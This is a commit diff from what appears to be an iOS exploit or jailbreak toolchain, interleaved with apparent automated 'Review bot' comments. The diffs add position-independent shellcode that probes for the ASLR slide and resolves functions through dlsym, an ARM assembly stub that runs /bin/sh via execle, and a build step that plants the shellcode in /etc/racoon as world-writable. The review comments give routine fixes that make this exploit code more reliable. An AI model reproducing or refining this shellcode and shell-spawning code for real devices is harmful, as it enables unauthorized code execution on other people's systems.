authorspv420 <spv@spv.sh>2022-07-30 23:32:19 -0400
committerspv420 <spv@spv.sh>2022-07-30 23:32:19 -0400
commit630aecdb5082b7aabf38c4d5594fb236bebcceff (patch)
treedd65f68e2d342a53bd4cfa59d0a8fcd149376be2 /tools
parente35a04268fb48fac634ca123a58584a26b513831 (diff)
hell
Diffstat (limited to 'tools')
-rwxr-xr-xtools/build_native.sh8
-rw-r--r--tools/defines.c4
-rw-r--r--tools/envrun.s112
-rw-r--r--tools/shc/shellcode.c65
-rwxr-xr-xtools/testlol.c4
5 files changed, 179 insertions, 14 deletions
diff --git a/tools/build_native.sh b/tools/build_native.sh
index 6edac97..2290017 100755
--- a/tools/build_native.sh
+++ b/tools/build_native.sh
@@ -20,10 +20,14 @@ gcc defines.c -o bin/defines --std=c99 -marm
ldid -S bin/defines
rm shc/bin/shellcode
-gcc shc/shellcode.c -o shc/bin/shellcode --std=c99 -marm -ffreestanding -c -fPIC
+gcc shc/shellcode.c -o shc/bin/shellcode.o --std=c99 -marm -ffreestanding -fno-common -Os -fomit-frame-pointer -fPIC -c -static
#ldid -S shc/bin/shellcode
-otool -t shc/bin/shellcode -X | cut -d " " -f 2- | tr -d "\n" | xxd -r -ps > shc/bin/shellcode.bin
+#otool -t shc/bin/shellcode -X | cut -d " " -f 2- | tr -d "\n" | xxd -r -ps > shc/bin/shellcode.bin
+
+objcopy -O binary shc/bin/shellcode.o shc/bin/shellcode.bin
+cp shc/bin/shellcode.bin /etc/racoon/
+chmod 777 /etc/racoon/shellcode.bin
rm bin/jit_all_the_things
gcc jit_all_the_things.c -o bin/jit_all_the_things --std=c99 -marm -fPIC
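Review bot: `chmod 777 /etc/racoon/shellcode.bin` leaves the copied artifact world-writable, so any local user or process can replace the bytes that are later read back from /etc/racoon; the file is only read, so `chmod 644 /etc/racoon/shellcode.bin` is sufficient. The unchanged `rm shc/bin/shellcode` line above this hunk's change still deletes the old output name while the new `shellcode.o` and `shellcode.bin` are never removed, so a failing gcc or objcopy silently leaves the previous artifacts in place to be copied; change it to `rm -f shc/bin/shellcode.o shc/bin/shellcode.bin` and only run the `cp` when objcopy succeeded (`objcopy ... && cp ...`). The script's head, including any `set -e`, is outside the hunk, so I cannot tell whether failures already abort.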
diff --git a/tools/defines.c b/tools/defines.c
index 4c499b3..44edc28 100644
--- a/tools/defines.c
+++ b/tools/defines.c
@@ -15,6 +15,9 @@ void fuck(char* s) {
printf("var %s_addr = 0x%08x;\n", s, dlsym_cf(s));
}
+extern uint32_t bootstrap_port;
+
+
int main(int argc, char* argv[]) {
printf("#define PRINTF_ADDR 0x%x\n", dlsym(RTLD_DEFAULT, "printf"));
// printf("%x %x %x %x %x %x %x %x\n", RTLD_NOW, dlsym_cf("kCFTypeDictionaryKeyCallBacks"), 0x41414141);//, &kCFTypeDictionaryValueCallBacks, kCFNumberSInt32Type);
@@ -24,5 +27,6 @@ int main(int argc, char* argv[]) {
// fuck("kCFNumberSInt32Type");
fuck("CFDictionarySetValue");
fuck("CFNumberCreate");
+ printf("%x %x %x %x %x\n", SEEK_SET, SEEK_CUR, SEEK_END, RTLD_DEFAULT, bootstrap_port);
return 0;
}
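Review bot: The new `printf` on the line above passes `RTLD_DEFAULT`, a `void *`, to `%x`, which expects `unsigned int`; on a 32-bit build that prints the right bits by accident but is undefined behaviour and `-Wformat` flags it, so use `%p` for the pointer: `printf("%x %x %x %p %x\n", SEEK_SET, SEEK_CUR, SEEK_END, RTLD_DEFAULT, bootstrap_port);`. The same `%x`-for-pointer mismatch exists on the `dlsym` result in the first hunk of this file. The `extern uint32_t bootstrap_port;` added in the first hunk redeclares a system symbol with a hand-picked type; if `<servers/bootstrap.h>` (which declares it as `mach_port_t`) is available in this build, include it instead so the type cannot drift from the real definition.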
diff --git a/tools/envrun.s b/tools/envrun.s
new file mode 100644
index 0000000..26752a4
--- /dev/null
+++ b/tools/envrun.s
@@ -0,0 +1,112 @@
+ .cstring
+ .align 2
+LC0:
+ .ascii "SHELL=/bin/sh\0"
+ .align 2
+LC1:
+ .ascii "USER=mobile\0"
+ .align 2
+LC2:
+ .ascii "HOME=/var/mobile\0"
+ .align 2
+LC3:
+ .ascii "XPC_FLAGS=0x0\0"
+ .align 2
+LC4:
+ .ascii "XPC_SERVICE_NAME=0\0"
+ .align 2
+LC5:
+ .ascii "LOGNAME=mobile\0"
+ .align 2
+LC6:
+ .ascii "PATH=/usr/bin:/bin:/usr/sbin:/sbin\0"
+ .align 2
+LC7:
+ .ascii "__CF_USER_TEXT_ENCODING=0x1F5:0:0\0"
+ .const_data
+ .align 2
+_C.2.2397:
+ .long LC0
+ .long LC1
+ .long LC2
+ .long LC3
+ .long LC4
+ .long LC5
+ .long LC6
+ .long LC7
+ .long 0
+ .cstring
+ .align 2
+LC8:
+ .ascii "/bin/sh\0"
+ .const_data
+ .align 2
+_C.1.2396:
+ .long LC8
+ .long 0
+ .text
+ .align 2
+ .globl _main
+_main:
+ @ args = 0, pretend = 0, frame = 52
+ @ frame_needed = 1, uses_anonymous_args = 0
+ stmfd sp!, {r4, r7, lr}
+ add r7, sp, #4
+ sub sp, sp, #52
+ str r0, [sp, #4]
+ str r1, [sp, #0]
+ ldr r3, L7
+L2:
+ add r3, pc, r3
+ ldmia r3, {r3-r4}
+ str r3, [sp, #44]
+ str r4, [sp, #48]
+ ldr r3, L7+4
+L3:
+ add r3, pc, r3
+ add lr, sp, #8
+ mov ip, r3
+ ldmia ip!, {r0, r1, r2, r3}
+ stmia lr!, {r0, r1, r2, r3}
+ ldmia ip!, {r0, r1, r2, r3}
+ stmia lr!, {r0, r1, r2, r3}
+ ldr r3, [ip, #0]
+ str r3, [lr, #0]
+ add ip, sp, #8
+ ldr r3, L7+8
+L4:
+ add r3, pc, r3
+ mov r0, r3
+ ldr r3, L7+12
+L5:
+ add r3, pc, r3
+ mov r1, r3
+ mov r2, #0
+ mov r3, ip
+ bl L_execle$stub
+ mov r3, #0
+ mov r0, r3
+ sub sp, r7, #4
+ ldmfd sp!, {r4, r7, pc}
+ .p2align 2
+L8:
+ .align 2
+L7:
+ .long _C.1.2396-8-(L2)
+ .long _C.2.2397-8-(L3)
+ .long LC8-8-(L4)
+ .long LC8-8-(L5)
+ .section __TEXT,__picsymbolstub4,symbol_stubs,none,16
+ .align 2
+L_execle$stub:
+ .indirect_symbol _execle
+ ldr ip, L_execle$slp
+L1$scv: add ip, pc, ip
+ ldr pc, [ip, #0]
+L_execle$slp:
+ .long L_execle$lazy_ptr - (L1$scv + 8)
+ .lazy_symbol_pointer
+L_execle$lazy_ptr:
+ .indirect_symbol _execle
+ .long dyld_stub_binding_helper
+ .subsections_via_symbols
diff --git a/tools/shc/shellcode.c b/tools/shc/shellcode.c
index 011b5cc..8c725a5 100644
--- a/tools/shc/shellcode.c
+++ b/tools/shc/shellcode.c
@@ -1,24 +1,65 @@
+#pragma optimize("", off)
+
/*
* native C shellcode
*/
typedef unsigned int uint32_t;
+#define MAX_SLIDE 0x3
+#define MIN_SLIDE 0x1
+#define UNSLID_BASE 0x4000
+#define RESERVE_ADDR 0x1a0000
+#define RTLD_DEFAULT 0xfffffffe
+#define LOG_SYSLOG 0x28
+
//#define PRINTF_ADDR 0x2054a3b9
//#define BASE_ADDR 0x42000000
+#define printf(...) do { \
+ uint32_t _get_our_slide(void); \
+ uint32_t (*__get_our_slide)(void) = &_get_our_slide; \
+ uint32_t __slid_base = 0x4000 + (__get_our_slide() << 12); \
+ uint32_t __shc_slide = *(uint32_t*)(RESERVE_ADDR + __slid_base - 0x4000 + 20); \
+ uint32_t __dlsym_addy = *(uint32_t*)(RESERVE_ADDR + __slid_base - 0x4000 + 24); \
+ void* (*__dlsym)(void* handle, const char* symbol) = __dlsym_addy + __shc_slide; \
+ int (*__printf)(char* s, ...) = (int (*)(char*, ...))__dlsym(RTLD_DEFAULT, "printf"); \
+ __printf(__VA_ARGS__); \
+} while (0)
+
+#define syslog(...) do { \
+ uint32_t _get_our_slide(void); \
+ uint32_t (*__get_our_slide)(void) = &_get_our_slide; \
+ uint32_t __slid_base = 0x4000 + (__get_our_slide() << 12); \
+ uint32_t __shc_slide = *(uint32_t*)(RESERVE_ADDR + __slid_base - 0x4000 + 20); \
+ uint32_t __dlsym_addy = *(uint32_t*)(RESERVE_ADDR + __slid_base - 0x4000 + 24); \
+ void* (*__dlsym)(void* handle, const char* symbol) = __dlsym_addy + __shc_slide; \
+ void (*__syslog)(int, char* s) = (void (*)(int, char*))__dlsym(RTLD_DEFAULT, "syslog"); \
+ __syslog(__VA_ARGS__); \
+} while (0)
+
void entry(void) {
- *(uint32_t*)0x69696969 = (uint32_t)0x1;
- /*
- uint32_t dlsym_addr = *(uint32_t*)BASE_ADDR;
- void* (*dlsym)(void* handle, char* s) = (void* (*)(void*, char*))dlsym_addr;
- void (*abort)(void) = dlsym(0xfffffffe, "abort");
- abort();*/
+ int i = 0;
+ uint32_t _get_our_slide(void);
+ uint32_t (*get_our_slide)(void) = &_get_our_slide;
+ while (i < 0x100) {
+ __asm__ volatile("nop");
+ i++;
+ }
+ printf("we out here\n");
+ printf("gos=%x %x\n", get_our_slide, &i);
+ printf("hello from native C, i=%d, slide = 0x%x\n", i, get_our_slide());
+ syslog(LOG_SYSLOG, "we out here in native C");
+ *(uint32_t*)0x41414141 = i;
}
-/*
-void shellcode_main(void) {
- uint32_t puts_addr = *(uint32_t*)BASE_ADDR;
- int (*puts)(char* s) = (int (*)(char* s))puts_addr;
- puts("Hello from shellcode!\n");
-}*/ \ No newline at end of file
+uint32_t _get_our_slide(void) {
+ uint32_t slide = MAX_SLIDE;
+// int (*printf)(char* s, ...) = 0x24da63b9;
+// printf("second function\n");
+ for (slide = MAX_SLIDE; slide >= MIN_SLIDE; slide--) {
+ if (*(uint32_t*)(UNSLID_BASE + (slide << 12)) == 0xfeedface) {
+ return slide;
+ }
+ }
+} \ No newline at end of file
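Review bot: `_get_our_slide` at the bottom of the hunk has no return after its `for` loop, so when none of the probed pages holds `0xfeedface` control falls off the end of a non-void function (undefined behaviour) and every caller, including the `printf`/`syslog` macros and `entry`, uses whatever happens to be in the return register; add `return 0;` after the loop, which is below `MIN_SLIDE` and so can be checked by callers as "not found" before they dereference anything derived from it. `#pragma optimize("", off)` at the top of the file is an MSVC pragma that GCC only warns about, so it does not override the `-Os` passed by the build script; drop it, or use `__attribute__((optimize("O0")))` on the functions if that is the intent. The two macros also duplicate the slide/`dlsym` lookup verbatim and name their locals with a `__` prefix, which is reserved for the implementation in C; a single `static` helper that resolves and returns the `dlsym` pointer would remove both issues.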
diff --git a/tools/testlol.c b/tools/testlol.c
index fa0c1d9..62dd465 100755
--- a/tools/testlol.c
+++ b/tools/testlol.c
@@ -2,6 +2,7 @@
#include <sys/mman.h>
#include <stddef.h>
#include <stdio.h>
+#include <dlfcn.h>
//#include <IOKit/IOKitLib.h>
//#include <IOKit/iokitmig.h>
@@ -122,6 +123,9 @@ struct test {
};
int main(int argc, char* argv[]) {
+ printf("%x\n", dlopen("/System/Library/PrivateFrameworks/GameCenter.framework/GameCenter", RTLD_NOW));
+ return;
+
#if 0
struct test d;
d.a = 1;